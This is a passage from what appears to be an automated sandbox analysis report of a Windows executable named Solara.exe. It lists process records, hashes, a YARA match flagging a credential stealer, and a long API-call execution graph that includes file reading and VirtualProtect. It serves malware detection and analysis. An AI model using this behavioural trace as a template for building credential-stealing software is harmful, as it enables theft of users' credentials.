                                                                                                                                    Start date:27/12/2024
                                                                                                                                    Path:C:\Users\user\Desktop\Solara.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\Solara.exe"
                                                                                                                                    Imagebase:0x200000
                                                                                                                                    File size:565'288 bytes
                                                                                                                                    MD5 hash:A58DEBBC1C1961456CA288898E937FFB
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:10:20:54
                                                                                                                                    Start date:27/12/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:10:20:55
                                                                                                                                    Start date:27/12/2024
                                                                                                                                    Path:C:\Users\user\Desktop\Solara.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\Solara.exe"
                                                                                                                                    Imagebase:0x200000
                                                                                                                                    File size:565'288 bytes
                                                                                                                                    MD5 hash:A58DEBBC1C1961456CA288898E937FFB
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1768091011.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:6.5%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                      Signature Coverage:5.4%
                                                                                                                                      Total number of Nodes:2000
                                                                                                                                      Total number of Limit Nodes:16
                                                                                                                                      execution_graph 19850 20b060 19873 20afc4 GetModuleHandleExW 19850->19873 19853 20b0a6 19854 20afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 19853->19854 19856 20b0ac 19854->19856 19861 20b0cd 19856->19861 19890 20afa7 GetModuleHandleExW 19856->19890 19860 20b0bd 19860->19861 19862 20b0c3 FreeLibraryWhenCallbackReturns 19860->19862 19875 207770 19861->19875 19862->19861 19863 20b0dd 19864 20afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 19863->19864 19865 20b0e3 19864->19865 19866 20b111 19865->19866 19867 20aefa 37 API calls 19865->19867 19868 20b0ef 19867->19868 19869 20efd2 ReleaseSRWLockExclusive 19868->19869 19870 20b102 19869->19870 19870->19866 19891 20e95d WakeAllConditionVariable 19870->19891 19874 20afda 19873->19874 19874->19853 19881 20aefa 19874->19881 19876 2077af 19875->19876 19892 208aa0 19876->19892 19877 2077b9 19897 20af64 19877->19897 19879 2077cb 19879->19863 19882 20efc1 12 API calls 19881->19882 19884 20af03 19882->19884 19883 20b317 std::_Throw_Cpp_error 30 API calls 19885 20af20 19883->19885 19884->19883 19886 20af17 19884->19886 19887 20efd2 19886->19887 19888 20efed 19887->19888 19889 20efdf ReleaseSRWLockExclusive 19887->19889 19888->19853 19889->19888 19890->19860 19891->19866 19893 208add 19892->19893 19896 208ae8 19893->19896 19900 2090e0 19893->19900 19917 2090f0 19893->19917 19896->19877 19898 20af70 CloseThreadpoolWork 19897->19898 19899 20af7b 19897->19899 19898->19899 19899->19879 19901 2090ea 19900->19901 19933 20efc1 19901->19933 19904 209136 19906 209143 19904->19906 19907 2091ce 19904->19907 19905 2091c7 19943 20b317 19905->19943 19909 209174 19906->19909 19910 20914b 19906->19910 19911 20b317 std::_Throw_Cpp_error 30 API calls 19907->19911 19912 20efd2 ReleaseSRWLockExclusive 19909->19912 19913 20efd2 ReleaseSRWLockExclusive 19910->19913 19915 209151 std::_Throw_Cpp_error 19911->19915 19914 209181 19912->19914 19913->19915 19936 2092f0 19914->19936 19915->19896 19918 20efc1 12 API calls 19917->19918 19919 20912b 19918->19919 19920 209136 19919->19920 19921 2091c7 19919->19921 19922 209143 19920->19922 19923 2091ce 19920->19923 19924 20b317 std::_Throw_Cpp_error 30 API calls 19921->19924 19925 209174 19922->19925 19926 20914b 19922->19926 19927 20b317 std::_Throw_Cpp_error 30 API calls 19923->19927 19924->19923 19928 20efd2 ReleaseSRWLockExclusive 19925->19928 19929 20efd2 ReleaseSRWLockExclusive 19926->19929 19930 209151 std::_Throw_Cpp_error 19927->19930 19931 209181 19928->19931 19929->19930 19930->19896 19932 2092f0 66 API calls 19931->19932 19932->19930 19949 20eff1 GetCurrentThreadId 19933->19949 19983 209620 19936->19983 19939 20939f 19992 209400 19939->19992 19944 20b32d std::_Throw_Cpp_error 19943->19944 20130 20b352 19944->20130 19950 20f03a 19949->19950 19951 20f01b 19949->19951 19953 20f043 19950->19953 19954 20f05a 19950->19954 19952 20f020 AcquireSRWLockExclusive 19951->19952 19960 20f030 19951->19960 19952->19960 19955 20f04e AcquireSRWLockExclusive 19953->19955 19953->19960 19956 20f0b9 19954->19956 19963 20f072 19954->19963 19955->19960 19958 20f0c0 TryAcquireSRWLockExclusive 19956->19958 19956->19960 19958->19960 19959 20912b 19959->19904 19959->19905 19964 20a6e1 19960->19964 19962 20f0a9 TryAcquireSRWLockExclusive 19962->19960 19962->19963 19963->19960 19963->19962 19971 20fdcd 19963->19971 19965 20a6e9 19964->19965 19966 20a6ea IsProcessorFeaturePresent 19964->19966 19965->19959 19968 20f447 19966->19968 19974 20f52d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19968->19974 19970 20f52a 19970->19959 19975 20fda6 19971->19975 19973 20fdd8 __aulldiv __aullrem 19973->19963 19974->19970 19978 2100b4 19975->19978 19979 2100f0 GetSystemTimeAsFileTime 19978->19979 19980 2100e4 GetSystemTimePreciseAsFileTime 19978->19980 19981 20fdb4 19979->19981 19980->19981 19981->19973 19984 209667 19983->19984 20017 20a663 19984->20017 19987 2094f0 19988 209536 std::_Throw_Cpp_error 19987->19988 19991 209540 std::_Throw_Cpp_error 19988->19991 20045 20b57d 19988->20045 19991->19939 19993 20efc1 12 API calls 19992->19993 19994 209418 19993->19994 19995 2094c6 19994->19995 19996 2094cd 19994->19996 19998 209443 19994->19998 19999 209438 19994->19999 19997 20b317 std::_Throw_Cpp_error 30 API calls 19995->19997 20000 20b317 std::_Throw_Cpp_error 30 API calls 19996->20000 19997->19996 20002 20efd2 ReleaseSRWLockExclusive 19998->20002 20001 20efd2 ReleaseSRWLockExclusive 19999->20001 20003 2094db 20000->20003 20004 2093ae 20001->20004 20005 209450 20002->20005 20006 20b317 std::_Throw_Cpp_error 30 API calls 20003->20006 20004->19915 20008 20efc1 12 API calls 20005->20008 20007 2094ec 20006->20007 20009 20945c 20008->20009 20009->19995 20010 209463 20009->20010 20010->20003 20011 20946f 20010->20011 20049 20e95d WakeAllConditionVariable 20011->20049 20013 20948b 20014 20efd2 ReleaseSRWLockExclusive 20013->20014 20015 209494 20014->20015 20015->20004 20050 207a10 20015->20050 20019 20a668 _Yarn 20017->20019 20018 20935f 20018->19987 20019->20018 20021 20a684 20019->20021 20028 215877 20019->20028 20022 20f338 std::ios_base::_Init 20021->20022 20023 20a68e Concurrency::cancel_current_task 20021->20023 20024 21060c Concurrency::cancel_current_task RaiseException 20022->20024 20031 21060c 20023->20031 20026 20f354 20024->20026 20027 20b4ce 20034 2158b2 20028->20034 20032 210654 RaiseException 20031->20032 20033 210626 20031->20033 20032->20027 20033->20032 20035 2158be ___scrt_is_nonwritable_in_current_image 20034->20035 20040 2180e1 EnterCriticalSection 20035->20040 20037 2158c9 std::locale::_Setgloballocale 20041 215900 20037->20041 20040->20037 20044 2180f8 LeaveCriticalSection 20041->20044 20043 215882 20043->20019 20044->20043 20046 20b58b Concurrency::cancel_current_task 20045->20046 20047 21060c Concurrency::cancel_current_task RaiseException 20046->20047 20048 20b599 20047->20048 20049->20013 20051 207a4f 20050->20051 20053 207a75 20051->20053 20054 207b60 20051->20054 20053->20015 20055 207ba7 20054->20055 20056 207bb0 20055->20056 20057 207bc5 20055->20057 20059 20a663 std::ios_base::_Init 3 API calls 20056->20059 20063 208970 20057->20063 20060 207c00 20059->20060 20064 2089a9 20063->20064 20065 2089b0 20063->20065 20064->20065 20131 20b35e __EH_prolog3_GS 20130->20131 20138 20b281 20131->20138 20135 20b387 std::_Throw_Cpp_error 20159 20fb97 20135->20159 20139 20b29e 20138->20139 20139->20139 20162 20b39f 20139->20162 20141 20b2b2 20142 203430 20141->20142 20143 20345e 20142->20143 20144 203468 20143->20144 20145 20358b 20143->20145 20147 2034a4 20144->20147 20148 2034bd 20144->20148 20157 203470 codecvt 20144->20157 20146 202600 std::_Throw_Cpp_error 30 API calls 20145->20146 20149 203530 20146->20149 20150 20a663 std::ios_base::_Init 3 API calls 20147->20150 20151 20a663 std::ios_base::_Init 3 API calls 20148->20151 20158 20355c _Deallocate 20149->20158 20208 217ddf 20149->20208 20150->20157 20151->20157 20154 2034f9 20156 210bf6 ___std_exception_copy 29 API calls 20154->20156 20156->20149 20197 2035a0 20157->20197 20158->20135 20160 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20159->20160 20161 20fba1 20160->20161 20161->20161 20163 20b3b6 std::_Throw_Cpp_error 20162->20163 20164 20b417 20162->20164 20168 20b3bd std::_Throw_Cpp_error codecvt 20163->20168 20169 20b449 20163->20169 20177 202600 20164->20177 20168->20141 20170 20b453 20169->20170 20171 20b455 20169->20171 20170->20168 20172 20b464 20171->20172 20173 20b45d 20171->20173 20174 20a663 std::ios_base::_Init 3 API calls 20172->20174 20180 20b46c 20173->20180 20176 20b462 20174->20176 20176->20168 20189 20b4cf 20177->20189 20181 202610 20180->20181 20182 20b47d 20180->20182 20183 21060c Concurrency::cancel_current_task RaiseException 20181->20183 20184 20a663 std::ios_base::_Init 3 API calls 20182->20184 20185 202642 20183->20185 20186 20b483 20184->20186 20187 210bf6 ___std_exception_copy 29 API calls 20185->20187 20186->20176 20188 202678 20187->20188 20188->20176 20194 20b59a 20189->20194 20192 21060c Concurrency::cancel_current_task RaiseException 20193 20b4ee 20192->20193 20195 20b14d std::exception::exception 29 API calls 20194->20195 20196 20b4e0 20195->20196 20196->20192 20198 2035dd 20197->20198 20200 20361a 20197->20200 20198->20200 20213 203790 20198->20213 20201 203790 std::_Throw_Cpp_error 30 API calls 20200->20201 20202 2036b0 codecvt 20200->20202 20201->20202 20203 2036fc _Deallocate 20202->20203 20204 217ddf std::_Throw_Cpp_error 29 API calls 20202->20204 20203->20154 20205 20374a 20204->20205 20227 201460 20205->20227 20207 20375f 20207->20154 20236 21801e 20208->20236 20210 217dee 20240 217dfc IsProcessorFeaturePresent 20210->20240 20212 217dfb 20214 2038d5 20213->20214 20219 2037ad 20213->20219 20215 202600 std::_Throw_Cpp_error 30 API calls 20214->20215 20225 2037dc codecvt 20215->20225 20216 2037d1 20217 20a663 std::ios_base::_Init 3 API calls 20216->20217 20217->20225 20218 217ddf std::_Throw_Cpp_error 29 API calls 20220 2038df 20218->20220 20219->20216 20221 2038c1 20219->20221 20223 2038bc 20219->20223 20219->20225 20222 20a663 std::ios_base::_Init 3 API calls 20221->20222 20222->20225 20231 202610 20223->20231 20225->20218 20226 203841 _Deallocate codecvt 20225->20226 20226->20200 20228 20146c 20227->20228 20229 201486 _Deallocate 20227->20229 20228->20229 20230 217ddf std::_Throw_Cpp_error 29 API calls 20228->20230 20229->20207 20230->20228 20232 21060c Concurrency::cancel_current_task RaiseException 20231->20232 20233 202642 20232->20233 20234 210bf6 ___std_exception_copy 29 API calls 20233->20234 20235 202678 20234->20235 20235->20221 20237 218030 _Fputc 20236->20237 20244 217f78 20237->20244 20239 218048 _Fputc 20239->20210 20241 217e08 20240->20241 20260 217e30 20241->20260 20245 217f8f 20244->20245 20246 217f88 20244->20246 20251 217f9d 20245->20251 20257 217ff5 20245->20257 20253 2137f0 GetLastError 20246->20253 20249 217fc4 20250 217dfc __Getctype 11 API calls 20249->20250 20249->20251 20252 217ff4 20250->20252 20251->20239 20254 213809 20253->20254 20255 21c36c __strnicoll 14 API calls 20254->20255 20256 213825 SetLastError 20255->20256 20256->20245 20258 218000 GetLastError SetLastError 20257->20258 20259 218019 20257->20259 20258->20249 20259->20249 20261 217e4c __fread_nolock std::locale::_Setgloballocale 20260->20261 20262 217e78 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20261->20262 20263 217f49 std::locale::_Setgloballocale 20262->20263 20264 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20263->20264 20265 217e1d GetCurrentProcess TerminateProcess 20264->20265 20265->20212 20266 2098f0 20267 2098f9 20266->20267 20268 20990f 20266->20268 20273 202270 GetModuleHandleA GetModuleFileNameW 20267->20273 20269 20b57d Concurrency::cancel_current_task RaiseException 20268->20269 20270 209914 20269->20270 20280 21a89a 20273->20280 20275 2022b0 20284 201fb0 GetPEB 20275->20284 20277 2022b9 20278 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20277->20278 20279 2022ca 20278->20279 20281 21a8ad _Fputc 20280->20281 20307 21a90f 20281->20307 20283 21a8bf _Fputc 20283->20275 20710 201240 20284->20710 20286 202009 CreateFileA 20288 202041 GetFileSize 20286->20288 20289 202225 20286->20289 20290 202055 20288->20290 20291 2021fc CloseHandle 20288->20291 20289->20277 20292 20205d ReadFile 20290->20292 20291->20289 20293 2021f3 20292->20293 20294 202079 CloseHandle 20292->20294 20293->20291 20295 202090 _Deallocate codecvt _strlen 20294->20295 20296 202205 20294->20296 20295->20296 20298 20223b 20295->20298 20300 202247 20295->20300 20302 20a663 RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20295->20302 20735 201000 20295->20735 20722 201ef0 20296->20722 20299 202600 std::_Throw_Cpp_error 30 API calls 20298->20299 20299->20300 20301 217ddf std::_Throw_Cpp_error 29 API calls 20300->20301 20303 20224c 20301->20303 20302->20295 20305 201460 std::_Throw_Cpp_error 29 API calls 20303->20305 20306 20225f 20305->20306 20306->20277 20308 21a93f 20307->20308 20309 21a96c 20308->20309 20310 21a94e 20308->20310 20328 21a943 20308->20328 20312 21a979 20309->20312 20331 213790 20309->20331 20311 217f78 __strnicoll 29 API calls 20310->20311 20311->20328 20313 21a9b1 20312->20313 20314 21a993 20312->20314 20319 21ab41 20313->20319 20320 21a9c5 20313->20320 20337 2266fb 20314->20337 20315 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20317 21abb4 20315->20317 20317->20283 20321 21c021 _Fputc WideCharToMultiByte 20319->20321 20319->20328 20322 21aa5f 20320->20322 20324 21aa09 20320->20324 20320->20328 20321->20328 20323 21c021 _Fputc WideCharToMultiByte 20322->20323 20326 21aa72 20323->20326 20341 21c021 20324->20341 20327 21aa8b GetLastError 20326->20327 20326->20328 20327->20328 20330 21aa9a 20327->20330 20328->20315 20329 21c021 _Fputc WideCharToMultiByte 20329->20330 20330->20328 20330->20329 20332 2137a0 20331->20332 20344 21c7a8 20332->20344 20340 226732 std::_Locinfo::_Locinfo_dtor codecvt 20337->20340 20338 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20339 226808 20338->20339 20339->20328 20340->20338 20342 21c034 _Fputc 20341->20342 20343 21c072 WideCharToMultiByte 20342->20343 20343->20328 20345 21c7bf 20344->20345 20347 2137bd 20344->20347 20345->20347 20352 2208a5 20345->20352 20348 21c7d9 20347->20348 20349 21c7f0 20348->20349 20350 2137ca 20348->20350 20349->20350 20707 21db02 20349->20707 20350->20312 20353 2208b1 ___scrt_is_nonwritable_in_current_image 20352->20353 20365 21c16a GetLastError 20353->20365 20357 2208d8 20393 220926 20357->20393 20362 220900 20362->20347 20366 21c180 20365->20366 20367 21c186 20365->20367 20411 21cb94 20366->20411 20371 21c18a SetLastError 20367->20371 20416 21cbd3 20367->20416 20375 21c21a 20371->20375 20376 21c21f 20371->20376 20375->20362 20392 2180e1 EnterCriticalSection 20375->20392 20379 218353 CallUnexpected 37 API calls 20376->20379 20377 21c1d0 20382 21cbd3 __dosmaperr 6 API calls 20377->20382 20378 21c1bf 20381 21cbd3 __dosmaperr 6 API calls 20378->20381 20380 21c224 20379->20380 20383 21c1cd 20381->20383 20384 21c1dc 20382->20384 20430 21bed7 20383->20430 20385 21c1e0 20384->20385 20386 21c1f7 20384->20386 20387 21cbd3 __dosmaperr 6 API calls 20385->20387 20436 21c47c 20386->20436 20387->20383 20391 21bed7 ___free_lconv_mon 14 API calls 20391->20371 20392->20357 20394 220934 __Getctype 20393->20394 20396 2208e9 20393->20396 20394->20396 20508 2206da 20394->20508 20397 220905 20396->20397 20618 2180f8 LeaveCriticalSection 20397->20618 20399 2208fc 20399->20362 20400 218353 20399->20400 20619 21e3a0 20400->20619 20403 218363 20405 21836d IsProcessorFeaturePresent 20403->20405 20406 21838c 20403->20406 20408 218379 20405->20408 20649 21555b 20406->20649 20410 217e30 std::locale::_Setgloballocale 8 API calls 20408->20410 20410->20406 20441 21cfd6 20411->20441 20414 21cbb9 20414->20367 20415 21cbcb TlsGetValue 20417 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 20416->20417 20418 21cbef 20417->20418 20419 21c1a2 20418->20419 20420 21cc0d TlsSetValue 20418->20420 20419->20371 20421 21d2b4 20419->20421 20422 21d2c1 20421->20422 20423 21d301 20422->20423 20424 21d2ec HeapAlloc 20422->20424 20429 21d2d5 __dosmaperr 20422->20429 20456 2176e4 20423->20456 20425 21d2ff 20424->20425 20424->20429 20427 21c1b7 20425->20427 20427->20377 20427->20378 20428 215877 std::ios_base::_Init 2 API calls 20428->20429 20429->20423 20429->20424 20429->20428 20431 21bee2 RtlFreeHeap 20430->20431 20435 21bf0c 20430->20435 20432 21bef7 GetLastError 20431->20432 20431->20435 20433 21bf04 __dosmaperr 20432->20433 20434 2176e4 __strnicoll 12 API calls 20433->20434 20434->20435 20435->20371 20482 21c5e2 20436->20482 20442 21d006 20441->20442 20446 21cbb0 20441->20446 20442->20446 20448 21cf0b 20442->20448 20445 21d020 GetProcAddress 20445->20446 20447 21d030 std::_Locinfo::_Locinfo_dtor 20445->20447 20446->20414 20446->20415 20447->20446 20454 21cf1c ___vcrt_FlsFree 20448->20454 20449 21cf3a LoadLibraryExW 20451 21cf55 GetLastError 20449->20451 20452 21cfb9 20449->20452 20450 21cfb2 20450->20445 20450->20446 20451->20454 20452->20450 20453 21cfcb FreeLibrary 20452->20453 20453->20450 20454->20449 20454->20450 20455 21cf88 LoadLibraryExW 20454->20455 20455->20452 20455->20454 20459 21c2bb GetLastError 20456->20459 20458 2176e9 20458->20427 20460 21c2d1 20459->20460 20461 21c2d7 20459->20461 20463 21cb94 __dosmaperr 6 API calls 20460->20463 20462 21cbd3 __dosmaperr 6 API calls 20461->20462 20465 21c2db SetLastError 20461->20465 20464 21c2f3 20462->20464 20463->20461 20464->20465 20467 21d2b4 __dosmaperr 12 API calls 20464->20467 20465->20458 20468 21c308 20467->20468 20469 21c321 20468->20469 20470 21c310 20468->20470 20472 21cbd3 __dosmaperr 6 API calls 20469->20472 20471 21cbd3 __dosmaperr 6 API calls 20470->20471 20473 21c31e 20471->20473 20474 21c32d 20472->20474 20478 21bed7 ___free_lconv_mon 12 API calls 20473->20478 20475 21c331 20474->20475 20476 21c348 20474->20476 20477 21cbd3 __dosmaperr 6 API calls 20475->20477 20479 21c47c __dosmaperr 12 API calls 20476->20479 20477->20473 20478->20465 20480 21c353 20479->20480 20481 21bed7 ___free_lconv_mon 12 API calls 20480->20481 20481->20465 20483 21c5ee ___scrt_is_nonwritable_in_current_image 20482->20483 20496 2180e1 EnterCriticalSection 20483->20496 20485 21c5f8 20497 21c628 20485->20497 20488 21c634 20489 21c640 ___scrt_is_nonwritable_in_current_image 20488->20489 20500 2180e1 EnterCriticalSection 20489->20500 20491 21c64a 20501 21c431 20491->20501 20493 21c662 20505 21c682 20493->20505 20496->20485 20498 2180f8 std::_Lockit::~_Lockit LeaveCriticalSection 20497->20498 20499 21c4ea 20498->20499 20499->20488 20500->20491 20502 21c440 __Getctype 20501->20502 20503 21c467 __Getctype 20501->20503 20502->20503 20504 2206da __Getctype 14 API calls 20502->20504 20503->20493 20504->20503 20506 2180f8 std::_Lockit::~_Lockit LeaveCriticalSection 20505->20506 20507 21c202 20506->20507 20507->20391 20510 22075a 20508->20510 20511 2206f0 20508->20511 20512 21bed7 ___free_lconv_mon 14 API calls 20510->20512 20535 2207a8 20510->20535 20511->20510 20516 21bed7 ___free_lconv_mon 14 API calls 20511->20516 20530 220723 20511->20530 20513 22077c 20512->20513 20514 21bed7 ___free_lconv_mon 14 API calls 20513->20514 20517 22078f 20514->20517 20515 21bed7 ___free_lconv_mon 14 API calls 20518 22074f 20515->20518 20520 220718 20516->20520 20522 21bed7 ___free_lconv_mon 14 API calls 20517->20522 20523 21bed7 ___free_lconv_mon 14 API calls 20518->20523 20519 220816 20524 21bed7 ___free_lconv_mon 14 API calls 20519->20524 20536 21fb31 20520->20536 20521 21bed7 ___free_lconv_mon 14 API calls 20527 22073a 20521->20527 20528 22079d 20522->20528 20523->20510 20529 22081c 20524->20529 20526 21bed7 14 API calls ___free_lconv_mon 20531 2207b6 20526->20531 20564 21fe4d 20527->20564 20533 21bed7 ___free_lconv_mon 14 API calls 20528->20533 20529->20396 20530->20521 20534 220745 20530->20534 20531->20519 20531->20526 20533->20535 20534->20515 20576 220874 20535->20576 20537 21fb42 20536->20537 20563 21fc2b 20536->20563 20538 21fb53 20537->20538 20539 21bed7 ___free_lconv_mon 14 API calls 20537->20539 20540 21fb65 20538->20540 20541 21bed7 ___free_lconv_mon 14 API calls 20538->20541 20539->20538 20542 21fb77 20540->20542 20543 21bed7 ___free_lconv_mon 14 API calls 20540->20543 20541->20540 20544 21fb89 20542->20544 20545 21bed7 ___free_lconv_mon 14 API calls 20542->20545 20543->20542 20546 21fb9b 20544->20546 20547 21bed7 ___free_lconv_mon 14 API calls 20544->20547 20545->20544 20548 21fbad 20546->20548 20549 21bed7 ___free_lconv_mon 14 API calls 20546->20549 20547->20546 20550 21bed7 ___free_lconv_mon 14 API calls 20548->20550 20554 21fbbf 20548->20554 20549->20548 20550->20554 20551 21bed7 ___free_lconv_mon 14 API calls 20553 21fbd1 20551->20553 20552 21fbe3 20556 21fbf5 20552->20556 20557 21bed7 ___free_lconv_mon 14 API calls 20552->20557 20553->20552 20555 21bed7 ___free_lconv_mon 14 API calls 20553->20555 20554->20551 20554->20553 20555->20552 20558 21fc07 20556->20558 20559 21bed7 ___free_lconv_mon 14 API calls 20556->20559 20557->20556 20560 21fc19 20558->20560 20561 21bed7 ___free_lconv_mon 14 API calls 20558->20561 20559->20558 20562 21bed7 ___free_lconv_mon 14 API calls 20560->20562 20560->20563 20561->20560 20562->20563 20563->20530 20565 21fe5a 20564->20565 20575 21feb2 20564->20575 20566 21bed7 ___free_lconv_mon 14 API calls 20565->20566 20567 21fe6a 20565->20567 20566->20567 20568 21fe7c 20567->20568 20569 21bed7 ___free_lconv_mon 14 API calls 20567->20569 20570 21fe8e 20568->20570 20571 21bed7 ___free_lconv_mon 14 API calls 20568->20571 20569->20568 20572 21fea0 20570->20572 20573 21bed7 ___free_lconv_mon 14 API calls 20570->20573 20571->20570 20574 21bed7 ___free_lconv_mon 14 API calls 20572->20574 20572->20575 20573->20572 20574->20575 20575->20534 20577 2208a0 20576->20577 20578 220881 20576->20578 20577->20531 20578->20577 20582 21ff3b 20578->20582 20581 21bed7 ___free_lconv_mon 14 API calls 20581->20577 20583 21ff4c 20582->20583 20584 220019 20582->20584 20585 22029b __Getctype 14 API calls 20583->20585 20584->20581 20586 21ff54 20585->20586 20587 22029b __Getctype 14 API calls 20586->20587 20588 21ff5f 20587->20588 20589 22029b __Getctype 14 API calls 20588->20589 20590 21ff6a 20589->20590 20591 22029b __Getctype 14 API calls 20590->20591 20592 21ff75 20591->20592 20593 22029b __Getctype 14 API calls 20592->20593 20594 21ff83 20593->20594 20595 21bed7 ___free_lconv_mon 14 API calls 20594->20595 20596 21ff8e 20595->20596 20597 21bed7 ___free_lconv_mon 14 API calls 20596->20597 20598 21ff99 20597->20598 20599 21bed7 ___free_lconv_mon 14 API calls 20598->20599 20600 21ffa4 20599->20600 20601 22029b __Getctype 14 API calls 20600->20601 20602 21ffb2 20601->20602 20603 22029b __Getctype 14 API calls 20602->20603 20604 21ffc0 20603->20604 20605 22029b __Getctype 14 API calls 20604->20605 20606 21ffd1 20605->20606 20607 22029b __Getctype 14 API calls 20606->20607 20608 21ffdf 20607->20608 20609 22029b __Getctype 14 API calls 20608->20609 20610 21ffed 20609->20610 20611 21bed7 ___free_lconv_mon 14 API calls 20610->20611 20618->20399 20652 21e623 20619->20652 20622 21e3c7 20627 21e3d3 ___scrt_is_nonwritable_in_current_image 20622->20627 20623 21c2bb __dosmaperr 14 API calls 20631 21e404 std::locale::_Setgloballocale 20623->20631 20624 21e423 20626 2176e4 __strnicoll 14 API calls 20624->20626 20625 21e435 std::locale::_Setgloballocale 20628 21e46b std::locale::_Setgloballocale 20625->20628 20665 2180e1 EnterCriticalSection 20625->20665 20629 21e428 20626->20629 20627->20623 20627->20624 20627->20625 20627->20631 20635 21e5a5 20628->20635 20639 21e4a8 20628->20639 20646 21e4d6 20628->20646 20662 217dcf 20629->20662 20631->20624 20631->20625 20633 21e40d 20631->20633 20633->20403 20641 21e5b0 20635->20641 20670 2180f8 LeaveCriticalSection 20635->20670 20637 21555b std::locale::_Setgloballocale 21 API calls 20642 21e5b8 20637->20642 20640 21c16a __Getctype 39 API calls 20639->20640 20639->20646 20643 21e4cb 20640->20643 20641->20637 20645 21c16a __Getctype 39 API calls 20643->20645 20644 21c16a __Getctype 39 API calls 20647 21e52b 20644->20647 20645->20646 20666 21e551 20646->20666 20647->20633 20648 21c16a __Getctype 39 API calls 20647->20648 20648->20633 20672 215690 20649->20672 20653 21e62f ___scrt_is_nonwritable_in_current_image 20652->20653 20658 2180e1 EnterCriticalSection 20653->20658 20655 21e63d 20659 21e67f 20655->20659 20658->20655 20660 2180f8 std::_Lockit::~_Lockit LeaveCriticalSection 20659->20660 20661 218358 20660->20661 20661->20403 20661->20622 20663 21801e __strnicoll 29 API calls 20662->20663 20664 217ddb 20663->20664 20664->20633 20665->20628 20667 21e51d 20666->20667 20668 21e555 20666->20668 20667->20633 20667->20644 20667->20647 20671 2180f8 LeaveCriticalSection 20668->20671 20670->20641 20671->20667 20673 2156bd 20672->20673 20674 2156cf 20672->20674 20699 20f896 GetModuleHandleW 20673->20699 20684 21582a 20674->20684 20679 21556c 20685 215836 ___scrt_is_nonwritable_in_current_image 20684->20685 20686 2180e1 std::_Lockit::_Lockit EnterCriticalSection 20685->20686 20687 215840 20686->20687 20688 215727 std::locale::_Setgloballocale 14 API calls 20687->20688 20689 21584d 20688->20689 20690 21586b std::locale::_Setgloballocale LeaveCriticalSection 20689->20690 20691 215706 20690->20691 20691->20679 20692 21565f 20691->20692 20693 215646 std::locale::_Setgloballocale 5 API calls 20692->20693 20694 215669 20693->20694 20695 21567d 20694->20695 20696 21566d GetCurrentProcess TerminateProcess 20694->20696 20697 2155c4 std::locale::_Setgloballocale GetModuleHandleExW GetProcAddress FreeLibrary 20695->20697 20696->20695 20698 215685 ExitProcess 20697->20698 20700 20f8a2 20699->20700 20700->20674 20701 2155c4 GetModuleHandleExW 20700->20701 20702 215603 GetProcAddress 20701->20702 20703 215624 20701->20703 20702->20703 20706 215617 20702->20706 20704 215633 20703->20704 20705 21562a FreeLibrary 20703->20705 20704->20674 20705->20704 20706->20703 20708 21c16a __Getctype 39 API calls 20707->20708 20709 21db07 20708->20709 20709->20350 20713 201283 _Deallocate codecvt _strlen 20710->20713 20721 201402 20710->20721 20711 201422 20712 202600 std::_Throw_Cpp_error 30 API calls 20711->20712 20714 20142e 20712->20714 20713->20711 20713->20714 20715 20a663 RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20713->20715 20719 201000 102 API calls 20713->20719 20713->20721 20716 217ddf std::_Throw_Cpp_error 29 API calls 20714->20716 20715->20713 20717 201433 20716->20717 20718 201460 std::_Throw_Cpp_error 29 API calls 20717->20718 20720 20144f 20718->20720 20719->20713 20720->20286 20721->20286 20723 201240 102 API calls 20722->20723 20724 201f18 FreeConsole 20723->20724 20741 2014b0 20724->20741 20726 201f39 20727 2014b0 103 API calls 20726->20727 20728 201f4a 20727->20728 20729 201240 102 API calls 20728->20729 20730 201f5d VirtualProtect 20729->20730 20732 201f7e 20730->20732 20733 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20732->20733 20734 201fa3 20733->20734 20734->20289 20736 201013 20735->20736 21210 202750 20736->21210 20742 2014f0 20741->20742 20742->20742 20746 201702 _Deallocate 20742->20746 20747 2016dd 20742->20747 20751 204320 20742->20751 20764 201750 20742->20764 20778 201d10 20742->20778 20746->20726 20747->20746 20748 217ddf std::_Throw_Cpp_error 29 API calls 20747->20748 20749 201725 20748->20749 20786 